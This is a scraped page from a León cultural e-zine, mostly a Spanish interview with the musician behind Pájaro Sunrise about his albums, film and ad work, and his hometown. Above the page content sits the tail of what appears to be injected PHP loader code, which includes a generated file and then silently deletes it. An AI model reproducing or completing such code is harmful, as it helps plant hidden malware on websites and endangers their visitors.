");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> el Rin.com, E-zine Inquieto y Agenda Cultural de León
Logo elrin.com
uvedoble-uvedoble-uvedoble-punto-elrin-punto-com elRin
Los datos de elRin.COM 1840 noticias publicadas
1690 Rineros registrados
0 Rineros conectados
10 anonimos conectados
652 mensajes en el foro
14069 mensajes en el foro antiguo
Frase Rinera: Vamos a ser mas grandes y mejores que los Beatles. [Milli Vanilli] Envía la tuya
Noticias pasadas

Entrevista a Pájaro Sunrise

paraleer

Yuri Méndez, abandonó León hace unos años para dedicarse en cuerpo y alma a la música en Madrid. Primero con Pepe López y ahora en solitario, la productividad de este muchacho es impresionante, tanto es así, que su próximo disco será doble, tiene un tema en una peli con Goya (El Lince Perdido) y ha musicado el anuncio de McDonalds.

Y para rematarlo, ¿conoces a muchos músicos que editen sus discos en Japón? No pudimos resistirnos a hacerle una entrevista para elrin.com, no le perdais de vista!

• ¿Pajaro Sunrise es ahora el nombre de tu proyecto en solitario?

No lo veo del todo como un proyecto en solitario a pesar de haber escrito la mayoría de las canciones o de haber acabado el disco solo. No puedo olvidar que empezó siendo una especie de juego con el que Pepe y yo matábamos el rato entre concierto y concierto; Mario se unió muy pronto y después ha habido un montón de gente que, en mayor o menor medida, también ha aportado su parte. Éste disco es –al menos un tercio de él- una herencia de todo aquello.

• ¿Hacia dónde va Pajaro Sunrise?, ¿cambios en estos dos años?

Quién sabe. De dos años acá todo lo que tenía alrededor ha dado un giro tremendo y, ya sólo por eso, sería de locos hacer suposiciones sobre a dónde va o si se dirige a algún sitio. Ni siquiera sé si habrá más discos o cómo serán; y me alegro de que sea así; de lo contrario, ¿dónde estaría la diversión?

• ¿Harás directos del nuevo disco?, ¿con banda?

Supongo que sí, pero no es que me muera de ganas. El proceso ha sido agotador y por ahora sólo quiero descansar, escuchar música y engordar como un pavo. Si cuando esté orondo y lozano me apetece volveré a tocar, pero por ahora quiero tomármelo con calma.

• ¿Qué tal la experiencia discográfica?, ¿estás contento con Lovemonk?

Más que contento. Por mi experiencia y por la de la mayoría de la gente que conozco en otros sellos, me siento como si me hubiese tocado la lotería con ellos; Borja y Bruno son sobre todo muy buena gente que, además, colaboran en todo lo posible para que grabe discos y que esos discos estén disponibles para quien quiera escucharlos. No puedo pedir nada más.

• De este segundo disco, ¿tantas canciones? ¿...no serás el nuevo Calamaro cuando sacó el Salmón?

Descartamos bastantes canciones antes de llegar a las veintidós que se han quedado; no fue algo premeditado ni falta de criterio. Suena a topicazo, pero hay una parte de verdad en que los discos se hacen solos y éste no es una excepción: un día vimos que la única forma de ordenar todo aquello era un doble álbum en el que cada disco fuese independiente. Buscamos otras opciones y siempre volvíamos a ésta, así que con ésta nos quedamos.

• ¿Cómo coño acabaste anunciando McDonald´s?, ¿te dan menús gratis desde entonces?

A los creativos que desarrollaron la campaña por lo visto les encantaba la canción. Aún así, cuando dijeron que querían usarla, pensé que estaban de broma. Teniendo en cuenta la cantidad de gente que conoce el grupo –esto es, no demasiada- son más bien ellos los que nos hacen publicidad y, en cuanto a su comida, me sienta fatal, así que me abstengo completamente.

Foto3

• ¿Qué se siente al tener un tema en una peli con Goya (el lince perdido), ¿como se llega a estar en todas las estanterías de los dvd´s infantiles de España?

Sergio de la Puente, autor del resto de la banda sonora, conocía el grupo por una campaña de la Comunidad de Madrid en la que habían usado como referencia un tema del primer disco; le había gustado mucho y, a través de una amiga común, me pidió que le ayudase a hacer una canción sobre la historia de la película. En principio ni siquiera iba a cantarla yo; simplemente teníamos que escribirla y luego buscar a alguien para que lo hiciese. Pero ocurrió lo habitual: a los directores les encantó la primera maqueta y acabó quedándose como estaba. El Goya ha sido una alegría porque había visto de cerca a un montón de gente que trabajó muchísimo para hacer que la película, aunque convencional, fuese decente, pero no creo que el premio tenga mucho que ver conmigo.

http://www.youtube.com/v/1mQUcuI5Wvo&hl=es&fs=1">http://www.youtube.com/v/1mQUcuI5Wvo&hl=es&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="295">

• ¿Proyectos a corto plazo?

¿Además de comer y dormir? De momento tenemos que acabar de mezclar el nuevo disco de Fabi y hay una gira por Alemania después del verano que aún no sé si haré. Luego tengo un montón de cosas pendientes, como ir a tocar a Japón, un disco de versiones casposas revisadas o grabar algo como Myshkine. Si tengo ganas, lo haré, pero por el momento es pronto para pensar en ello.

• ¿Después de tantos años en Madrid?, ¿cómo se ve León?

Hace ocho años que vivo aquí, aunque puede que en los dos últimos me haya alejado un poco más de León y decir que lo echo de menos sería mentir. Ésta tampoco es mi ciudad pero de momento me da más cosas de las que León me dio nunca y, a pesar de que creo que me iré tarde o temprano, por ahora es donde está mi vida. León tiene mucho de bueno y mucho que odio con toda mi alma; supongo que cuando sea algo mayor y tenga más perspectiva seré capaz de olvidar una cosa u otra. De momento, me basta con estar lejos.

• ¿Vas a venir a tocar algún día por aquí?

No parece probable, pero vaya usted a saber.

http://www.youtube.com/v/hYsUFZGOCCU&hl=es&fs=1">http://www.youtube.com/v/hYsUFZGOCCU&hl=es&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="295">

www.myspace.com/pajarosunrise

www.pajarosunrise.com

www.pajarosunrise.blogspot.com

Noticias pasadas
Noticias Agenda
Opinodromo

Último mensaje

Opinodromo antiguo
Tablón de anuncios

Estamos en ello

Estamos trabajando en el nuevo tablón de anuncios. Todavia no está operativo.

Grupos de León
Noticias pasadas

Ataxia Electronic Foundation

Ataxia Electronic Foundation

5 de Noviembre de 2005